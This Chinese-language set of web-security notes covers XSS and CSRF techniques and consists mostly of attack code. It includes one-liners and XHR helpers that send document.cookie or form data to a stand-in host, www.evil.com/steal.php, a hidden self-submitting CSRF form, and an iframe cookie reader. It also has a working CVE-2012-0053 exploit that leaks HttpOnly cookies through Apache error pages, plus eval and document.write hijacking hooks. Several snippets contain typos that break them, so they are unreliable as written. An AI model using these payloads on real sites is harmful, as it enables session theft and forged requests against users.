一.模拟用户发起浏览器请求

        1.1 GET方式,实际上就是一个URL

new Image().src="http://www.evil.com/steal.php"+escape(document.cookie)
location.href="http://www.evil.com/steal.php"+escape(document.cookie)

        1.2 POST请求

              同步发送请求

xhr=function(){
    var request=false;
    if(window.XMLHttpRequest){
        request=New XMLHttpRequest();
    }
    else if (window.ActiveXObject){
        try{
            request=new window.ActiveXObject('Microsoft.XMLHTTP');
        } catch(e){ }
    }
    return request;
}();
request=function(method,src,argv,content_type){
xhr.open(method,src,false);//同步方式
if(method=='POST') xhr.setRequestHeader('Content-Type',content_type);
xhr.send(argv);
return xhr.responseText;
}
//默认表单形式
attack_a=function(){
    var src="http://www.evil.com/steal.php";
    var argv_0="&name1=value1&name2=value2";
    request("POST",src,argv_0,"application/x-www-form-urlencoded");//默认表单形式
}

//文件上传的表单
attack_a=function(){
    var src="http://www.evil.com/steal.php";
    var name1="value1";
    var name2="value2";
    var argv_0="\r\n";//HTTP消息头的第一行是空白的
    argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name1\"\r\n\r\n"
    argv_0+=(name1+"\r\n");
    argv_0+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"name2\"\r\n\r\n"
    argv_0+=(name2+"\r\n");
    argv+="---------------------7964f8dddeb95fc5--\r\n";//最后有两个减号--,表示HTTP 消息头结束
    request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
}

        Form表单自提交,常用于CSRF攻击中

function new_form(){
    var f=document.createElement("form");
    document.body.appendChild(f);
    f.method="post";
    return f;
}
function create_elements(eForm,eName,eValue)
{
   var e=document.createElement("input");
    eForm.appendChild(e);
    e.type='text';
    e.name=eName;
    if(!document.all){
        e.style.display='none';
    }
    else{
        e.style.display='block';
        e.style.width='0px';
        e.style.height='0px';
    }
    e.value=eValue;
    return e;
}
var _f=new_form();//创建一个form对象
create_elements(_f,"name1","value1");//创建form中的input对象
create_elements(_f,"name2","value2");
_f.action="http://www.evil.com/steal1.php";//form提交网址
_f.submit();//提交 

二.Cookie机制

2.1子域Cookie机制,不同子域可以共享父域的Cookie

2.2路径Cookie机制,可以跨iframe跨路径读Cookie

xc=function(src){
    var o=document.createElement("iframe");//iframe进入同域的目标
    o.src=src;
    ducument.getElementsByTagName("body")[0].appendChild(o);
    o.onload=function(){//iframe加载完成后
        d=o.contentDocument||o.contentWindow.document;//获取document对象
        alert(d.cookie);//获取cookie
    };
}('http://a.foo.com/admin/index.php');

<?php
setcookie("test",1,time()+3600,"","",0);//设置普通Cookie
setcookie("test_http",1,time()+3600,"","",0,1);//最后一个参数是HttpOnly标志,0为关闭,1为开启,默认0
?>

(1)php的phpinfo()信息会导致HttpOnly Cookie泄漏

(2)Django应用调试信息

(3)CVE-2012-0053 错误暴露HttpOnly Cookie

// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {//清空垃圾Cookies
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {//添加垃圾Cookies
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
 
function makeRequest() {
setCookies();
 
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies[i].split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
 
makeRequest();

Apache HTTP Server 2.2.x 多个版本没有严格限制HTTP 请求头信息,HTTP 请求头信息超过LimitRequestFieldSize长度时,服务器返回400,并将出错的请求头内容输出

2.3 Secure Cookie机制

document.cookie="test_secure=hijack;path=/;secure;"//path与domain必须一致,否则会被认为是不同的Cookie

三.JavaScript函数劫持

var _eval=eval;
eval=function(x){
if(typeof(x)=='undefined') {return;}
alert(x);
_eval(x);
}

var _write=document.write.bind(document);
document.write=function(x){
if(typeof(x)=='underfined'){return;}
_write(x);
};

var _write=document.write;
document.write=function(x){
if(typeof(x)=='undefined'){return;}
_write.call(document,x);
};

document.write("<script>alert(1)</script>");